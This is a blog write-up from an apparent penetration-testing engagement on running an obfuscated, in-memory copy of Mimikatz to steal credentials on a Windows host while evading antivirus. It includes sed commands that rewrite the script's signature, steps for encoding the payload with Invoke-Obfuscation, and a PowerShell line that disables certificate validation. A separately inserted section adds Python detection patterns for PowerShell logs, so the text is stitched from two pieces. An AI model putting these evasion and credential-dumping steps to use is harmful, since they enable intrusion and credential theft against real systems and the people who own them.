Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

About

The other day I was part of an engagement that required post-exploitation of the target system (administrative access had already been obtained) and stealing credentials. There are many posts online that have done this, and I will be referencing them as we go. This is just a supplement to everything else out there.

Mimikatz is a tool that collects credentials, including cleartext passwords, LAN Manager hashes, Kerberos tickets and a number of other items. This post leverages Mimikatz, but instead of downloading the binary to the target's disk and risking tripping AntiVirus or other host-based controls, we will download the script directly into memory and run it without ever touching disk.

Additionally, there are a few obfuscation techniques, using simple Linux fu, that help generate this "custom" version of Mimikatz to bypass AV. Lastly, there is another technique to obfuscate the actual PowerShell command that downloads and runs the script.



Prerequisites

During my engagement, I didn't want to download Mimikatz, nor a custom version of Mimikatz off the Internet. I wanted to already have a local copy on my attacking machine. Because of this, there are a few prerequisites to consider prior to beginning:

  • Have a web server you can use to serve the Mimikatz file
    • I used Kali and had an Apache server running
    • This is helpful so you can download Mimikatz locally to your attacking machine and not have to call it through the Internet when performing this engagement
    • Additionally, you can create the custom version of Mimikatz and host it somewhere on the web to download. This will help bypass any blacklist controls.
  • Set up the web server to run over SSL
    • I noticed that there were some controls on the network that caused issues when downloading the script via powershell over HTTP. After some troubleshooting, I figured that by encrypting the traffic (using HTTPS instead of HTTP), we may be able to bypass any possible network controls.
    • We are hoping that by performing encryption on the website, we will be able to hide our custom Mimikatz script.
  • Need to be running as Administrator/System on the target machine
    • Mimikatz is a post-exploitation password-dumping tool. It requires administrative access on the target machine.

Legend

  • Target: The victim machine you have gained Administrative access to
  • Kali: One of my testing/attacking machines (Linux distro)
  • Windows Lab Machine: Another testing/attacking machine I used to help test. This was a Windows 7 OS

The Attack

We begin by pulling down a copy of Mimikatz from the Internet onto our Kali/Testing/Attacking machine. A copy of the file can be found here [1].




Verify the file is saved in the web directory, that it has read access and that your web server is up and running.

Next, run some obfuscation techniques on the downloaded "Invoke-Mimikatz.ps1" file. A great write-up was written by Carrie Roberts of Black Hills and can be found here [2]. By performing these match-and-replace steps, we are hoping to alter the file's signature enough to get past signature-based detection. Feel free to change some of the "replace" words to your own. This will help keep this file from always being the same obfuscated file.


# Rename the main function so the well-known cmdlet name no longer appears
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
# Strip the <# ... #> block comments (help text)
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
# Strip whole-line # comments
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
# Rename parameters and internal identifiers
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/BirdIsTheWord/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/UnceUnceUnce/g' Invoke-Mimikatz.ps1
# Append a trailing comment marker to lines that end with the -Win32Functions argument
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

Once obfuscation is complete, rename the file so it doesn't have the default "Invoke-Mimikatz.ps1" name:


Next, we will use a tool called Invoke-Obfuscation. This is a great tool by Daniel Bohannon; his GitHub repository can be found here [3]. I downloaded this tool to my Windows Lab Machine. This way I can generate my payload offline in a lab and copy its contents directly to my target machine. Once downloaded, navigate to the directory and run the Invoke-Obfuscation script:


Once Invoke-Obfuscation is up, we set the SCRIPTBLOCK (the PowerShell command we want to run on the target machine):



Next, we choose the "ENCODING" option to obfuscate the entire command via Encoding:



We then choose Option 5, which will encrypt the entire command as SecureString (AES):



We then copy out the results and reformat it so it is a one-line payload.

Next, on the Target Machine, we open an administrative command prompt, start PowerShell, verify the ExecutionPolicy is Unrestricted, and bypass invalid SSL certificates (I understand I could have included some of these commands/flags in my obfuscation script; I just didn't do it in this example).



C:\>powershell 
Windows PowerShell
Copyright (C) 2013 Microsoft Corporation. All rights reserved.

PS C:\> Get-ExecutionPolicy
Unrestricted
PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback =
{$true} ;


We then paste the Invoke-Obfuscation output into the Target Machine's PowerShell prompt:



We have successfully executed Mimikatz in memory, bypassing AV.
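As an added defender-side example, not from the original post: a small Python triage routine over constructed PowerShell script block log records (Event ID 4104) that flags the artifacts this procedure leaves behind: the certificate-validation bypass, the in-memory download and Invoke-Expression, the ConvertTo-SecureString/PtrToStringAuto decode pattern used for SecureString-encoded payloads, and Mimikatz identifiers that survive the sed renames. The log records, their layout (id, event_id, script) and the encoded string are constructed samples.

```python
import re

# Indicators that the procedure in this post leaves in PowerShell script block
# logs (Event ID 4104). The patterns tolerate the rename-style obfuscation shown
# above (Invoke-Mimidogz, DumpCred, ...): renaming changes identifiers, not the
# structure of the script or the commands used to fetch and run it.
INDICATORS = {
    "cert-validation-bypass": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "in-memory-download": re.compile(
        r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest", re.I),
    "invoke-expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    # SecureString-encoded payloads are decoded with these .NET calls.
    "securestring-decode": re.compile(
        r"(?=.*ConvertTo-SecureString)(?=.*(PtrToStringAuto|SecureStringToBSTR))",
        re.I | re.S),
    "mimikatz-structure": re.compile(
        r"Invoke-Mimi\w+|\bDumpCreds?\b|Win32Functions", re.I),
}

def match_indicators(script_text):
    """Return the sorted indicator names present in one script block."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))

def triage(events, threshold=2):
    """events: dicts with id, event_id and script. Returns (id, indicators)
    for each 4104 record reaching `threshold` indicators; a single hit
    (e.g. only the certificate bypass) is left for lower-priority review."""
    hits = []
    for ev in events:
        if ev["event_id"] != 4104:
            continue
        found = match_indicators(ev["script"])
        if len(found) >= threshold:
            hits.append((ev["id"], found))
    return hits

# Constructed sample records (not real captures); the encoded string is a
# placeholder, not real Invoke-Obfuscation output.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 4104, "script": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"id": 2, "event_id": 4104, "script":
     "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"},
    {"id": 3, "event_id": 4104, "script":
     "IEX ([Runtime.InteropServices.Marshal]::PtrToStringAuto("
     "[Runtime.InteropServices.Marshal]::SecureStringToBSTR("
     "$('<encoded-placeholder>' | ConvertTo-SecureString -Key (1..16)))))"},
    {"id": 4, "event_id": 4103, "script": "Invoke-Mimidogz -DumpCred"},  # not 4104
]
```

Pairing this with Script Block Logging turned on matters more than the patterns themselves: the decoded command lands in 4104 regardless of how it was encoded on the way in.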

While this may not have been the perfect way to accomplish the task and there certainly may be other better ways, this worked for my use case.

I hope this helps!

Until next time.

geoda

Links


[1] https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
[2] https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
[3] https://github.com/danielbohannon/Invoke-Obfuscation